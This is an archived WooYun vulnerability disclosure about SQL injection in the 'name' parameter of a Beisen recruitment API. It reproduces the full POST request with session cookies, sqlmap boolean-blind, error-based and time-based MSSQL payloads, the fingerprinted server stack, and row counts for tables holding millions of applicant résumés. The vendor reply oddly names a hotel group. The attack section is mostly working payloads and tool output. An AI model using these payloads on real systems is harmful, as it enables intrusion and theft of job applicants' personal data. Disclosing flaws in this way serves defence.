乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-13: 细节已通知厂商并且等待厂商处理中 2016-03-14: 厂商已经确认,细节仅向厂商公开 2016-03-24: 细节向核心白帽子及相关领域专家公开 2016-04-03: 细节向普通白帽子公开 2016-04-13: 细节向实习白帽子公开 2016-04-28: 细节向公众公开
RT
漏洞位置:
漏洞地址:
POST /api/InternalInfo/InternalRecommendJobAdListForPy HTTP/1.1Accept-Language: zh-CNX-Requested-With: XMLHttpRequestAccept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7Referer: http://recruitofficer.tms.beisen.com/PyInternal/RecommendList?From=CustomUser-Agent: Mozilla/5.0 (Linux; U; Android 4.4.4; zh-cn; MI NOTE LTE Build/KTU84P) AppleWebKit/533.1 (KHTML, like Gecko)Version/4.0 MQQBrowser/5.4 TBS/025489 Mobile Safari/533.1 MicroMessenger/6.3.13.49_r4080b63.740 NetType/WIFI Language/zh_CNOrigin: http://recruitofficer.tms.beisen.comAccept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzipHost: recruitofficer.tms.beisen.comCookie: beisenBusiType=JRv3/pK7NziIls4YxGA20w==; beisenCache6=C4SrRW0T8K1c+nNU0WUJlNVchab9/ID4p/t53IGXkzqVYvI+LRIurtLiFgdyfNJCMAaNkLRPys6hSetzj30FJMcPz8HiQSy3cz/pQ/4/rSMdh6NQI8XUJDC1wGGGm14XEBNNImV1PdiGp4tZNxR4krTgDoxwiwJ1uPcxPz2/zUFeWtFlig4nH1ZfNqtF7tC02G2myFiAktQfDFCfp0WQGplKcea6B3pKTIscGXvZNuHdCpjb6EZ8D5btrAOI4yuLEDI1u2PGJgseabEgimWZF/AROVhscEWCXGnBRI1dNVLcwFp598/kAd9TzJuhnKSi6hbvklSFc/MRsgLKdJMEa81u8rIsMijhJcpi5hmdzAs=; beisenVersion=sV0zQHmV7HA8ZV5SYGkVgA==; gr_session_id_e30f00323ed092421ec53b5aa52e4465=7820e748-50a0-4591-88e2-188433c35cd7; gr_user_id=3547aaf3-91c3-4793-a649-be6a8582fe89Content-Length: 53pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7*
name参数存在注入
---Parameter: #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 7680=7680 AND '%'=' Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 3354=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(122)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (3354=3354) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(118)+CHAR(112)+CHAR(113))) AND '%'=' Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: pageNum=1&pageSize=10&locId=0&name=%E4%B8%8A%E6%B5%B7%' AND 4713=(SELECT COUNT(*) FROMsysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND '%'='---[20:30:16] [INFO] testing Microsoft SQL Server[20:30:16] [INFO] confirming Microsoft SQL Server[20:30:17] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008 R2 or 7web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NETback-end DBMS: Microsoft SQL Server 2008
数据库:
数据信息很大的说,看下面,至于都有哪些信息,你们比我更懂,仅作测试,未dump数据库,日志可查,求个高rank可好?
Database: BeisenRecruitment001+-------------------------------------------------------------+---------+| Table | Entries |+-------------------------------------------------------------+---------+| dbo.Rel_ObjectDataOfApplicant | 21910244 || dbo.StandardResumeDetailValue | 18802224 || dbo.RelationHistory | 11254767 || dbo.ApplyDocument | 7516347 || dbo.ApplicantHistory | 6111962 || dbo.ApplicantHistoryDigest | 5173063 || dbo.PhaseTransferHistory | 4925655 || dbo.REL_PersonJobStoreDB | 4376542 || dbo.ResumeExperience | 4144101 || dbo.ApplicantImportCenterInfo | 2715594 || dbo.ResumeEducation | 2707816 || dbo.Rel_ObjectDataOfApply | 2616834 || dbo.SearchCV | 2605691 || dbo.SearchCVExtend | 2601771 || dbo.ApplicantProfileLite | 2590488 || dbo.StandradResumeValue | 2469684 || dbo.REL_PersonJobHistory | 2425882 || dbo.PersonApplyStat | 1998890 || dbo.MailMessage | 1339401 || dbo.GenericExtendCounter | 1256675 || dbo.PendingPerson | 1179443 || dbo.ResumeProject | 1056161 || dbo.PersonStoreDbHistory | 938211 || dbo.ApplicantImportCenter | 285102 || dbo.SerialNumber | 266092 || dbo.SynchronizeApplicant_SearchCV_GetPersonID_ParametersLog | 259574 || dbo.SerialNumberHistory | 243251 || dbo.MessageSentHistory | 240622 || dbo.REL_BeisenUserID | 233569 || dbo.InterviewHistory | 146300 || dbo.Relation_Interview_Interviewee | 131212 || dbo.Remark | 116225 || dbo.JobRelationOperationHistory | 107369 || dbo.Rel_PersonAndResumeFilter | 89735 || dbo.TitaTaskManage | 81698 || dbo.AppMessage | 78557 || dbo.InterviewInfoHistroy | 76967 || dbo.InterviewInfo | 73927 || dbo.ProxyLog | 73015 || dbo.Relation_Interview_RemindJob | 72799 || dbo.ReplyRecord | 62606 || dbo.DownLoadedResume | 61974 || dbo.ProcessPhaseStatusConfig | 60397 || dbo.Counter_2 | 53073 || dbo.Relation_Interview_Interviewer | 51759 || dbo.ReplySetHistory | 48092 || dbo.Rel_PhaseAndStatus | 45542 || dbo.InterviewEvaluateResult | 43635 || dbo.UploadedAttachment | 40956 || dbo.ReplyMessageInfo | 35024 || dbo.InterviewerReplySendRecord | 33324 || dbo.JobAdChannel_Class | 28797 || dbo.JobAD | 27143 || dbo.JobADLoc | 25640 || dbo.Rel_ProcessAndPhase | 24893 || dbo.InterviewFeedBack | 24355 || dbo.JobAd_External | 23578 || dbo.JobBrowseLog | 22272 || dbo.Job | 19671 || dbo.ProcessPhase | 19285 || dbo.ProcessStatus | 19110 || dbo.JobADAdditionalObject | 17633 || dbo.ResumeTempFolder | 17386 || dbo.ResumeFilter | 16533 || dbo.WechatUserAndPerson | 15892 || dbo.ReportLog | 15809 || dbo.Rel_ResumeTempFolderAndUser | 15744 || dbo.EmaiJobRule | 15392 || dbo.JobLoc | 12968 || dbo.ProcessReason | 11750 || dbo.JobAdChannel_Apply | 10986 || dbo.Officer | 10885 || dbo.Rel_StatusAndReason | 10446 || dbo.ResumeDownload | 9883 || dbo.REL_ObjectId_ShareGroupId | 9232 || dbo.OfferHistory | 9049 || dbo.InterviewerReply | 8989 || dbo.BatchRankingScore | 7436 || dbo.RecieveSummary | 7283 || dbo.Rel_ApplicantAndLabel | 7135 || dbo.REL_JobAndInterviewEvaluation | 6754 || dbo.SendMailLog | 6420 || dbo.InterviewEvaluationDetailItem | 6050 || dbo.ExportHistory | 5984 || dbo.ApplicantViewCondition | 5980 || dbo.ConstItem | 5913 || dbo.TitaPorjectManage | 5753 || dbo.Permission | 5176 || dbo.EffectiveOffer | 4958 || dbo.EffectiveOfferApply | 4898 || dbo.RecruitProcess | 4599 || dbo.HrJobBrowseLog | 4484 || dbo.OfferAssesment | 4049 || dbo.OfferCreaterMailInfo | 3849 || dbo.Offer | 3779 || dbo.Interview | 3595 || dbo.AutoInvitTest | 3348 || dbo.ApplicantView | 3009 || dbo.Rel_InternalRecommend | 2994 || dbo.OfferApply | 2849 || dbo.Relation_InterviewMessage_Interviewee | 2627 || dbo.StoreDB | 2440 || dbo.Finder | 2141 || dbo.SearchFieldOption | 1956 || dbo.StaticizeLog | 1899 || dbo.Attention | 1852 || dbo.BizLookLog | 1711 || dbo.ChannelRelation | 1657 || dbo.MicroProcessMessageLog | 1335 || dbo.InterviewLocation | 1316 || dbo.RewardRulesSublist | 1098 || dbo.StatisticsThisMonth | 1035 || dbo.JobADPostUserName | 919 || dbo.ConstItemId | 825 || dbo.ApplicantLock | 739 || dbo.RecruitPackage | 716 || dbo.ChannelAuthorize | 691 || dbo.ChannelSource | 677 || dbo.ExamRoomPlan | 666 || dbo.InterviewInfoType | 632 || dbo.BadMessage | 604 || dbo.InterviewSession | 573 || dbo.MicroProcessActivity | 566 || dbo.BlackListHistory | 545 || dbo.RewardRules | 457 || dbo.RecuritProject | 440 || dbo.BlackList | 419 || dbo.MicroProcess | 360 || dbo.ExportFieldTemplate | 357 || dbo.WebotSyncRecord | 336 || dbo.ChannelDeliveryMapping | 310 || dbo.InterviewEvaluationPartItem | 309 || dbo.GlobalSetting | 296 || dbo.ResumeKeywordsLibrary | 294 || dbo.HunterAccount | 249 || dbo.Label | 242 || dbo.MailReceiveStrategy | 238 || dbo.ReceiveEmailList | 238 || dbo.IndexMap | 192 || dbo.JobTitleLibrary | 185 || dbo.Duty | 182 || dbo.ReSendEmailOrSmsHistory | 177 || dbo.StandardResumeDetailField | 157 || dbo.Station | 141 || dbo.ConstType | 136 || dbo.CadidateId | 131 || dbo.InterviewEvaluationBasicInfo | 126 || dbo.JobTemplate | 125 || dbo.SelectAllPageErrorInfo | 121 || dbo.InterviewEvaluate | 101 || dbo.InterviewSite | 97 || dbo.MarketActivity | 96 || dbo.WeChatOfficer_MyRecommend_CountResult | 73 || dbo.FromList | 56 || dbo.Requirement | 56 || dbo.TalentMining | 52 || dbo.WeChatOfficer_PyInternal_CountResult | 49 || dbo.Relation_InterviewMessage_Officer | 47 || dbo.InterviewEvaluationDictDetial | 40 || dbo.Assesment | 39 || dbo.InterviewSite_Officers | 36 || dbo.ExamRoom | 28 || dbo.RestTime | 28 || dbo.Widget_Option | 28 || dbo.Medium | 27 || dbo.RankAndFilter | 25 || dbo.Invitation | 23 || dbo.ApplicantLockSet | 18 || dbo.WeChatOfficer_RedEnvelopes | 16 || dbo.RankingScoreHistory | 15 || dbo.StandardResumeDetailSection | 14 || dbo.ActionTiggerCondition | 13 || dbo.ActionForSendNotification | 11 || dbo.RecuritProjectCondition | 11 || dbo.AutoTask | 10 || dbo.Functions | 10 || dbo.ChannelKind | 9 || dbo.StandardResumeField | 9 || dbo.MediumGroup | 8 || dbo.Widget | 7 || dbo.InterviewEvaluationDictType | 4 || dbo.TaskItem | 3 || dbo.AccessmentResultForUpdateApply | 2 || dbo.DefaultEmailReceiveStrategy | 2 || dbo.InterviewEamilEvaluation | 1 |+-------------------------------------------------------------+---------+Database: msdb+-------------------------------------------------------------+---------+| Table | Entries |+-------------------------------------------------------------+---------+| dbo.backupfile | 975572 || dbo.backupset | 487786 || dbo.backupmediafamily | 487783 || dbo.backupmediaset | 487783 || dbo.restorefile | 68 || dbo.restorefilegroup | 34 || dbo.restorehistory | 34 || dbo.syspolicy_configuration | 4 |+-------------------------------------------------------------+---------+
过滤
危害等级:高
漏洞Rank:12
确认时间:2016-03-14 16:09
您好!感谢对华住酒店集团的关注,此问题己移交相关团队跟进处理。
暂无
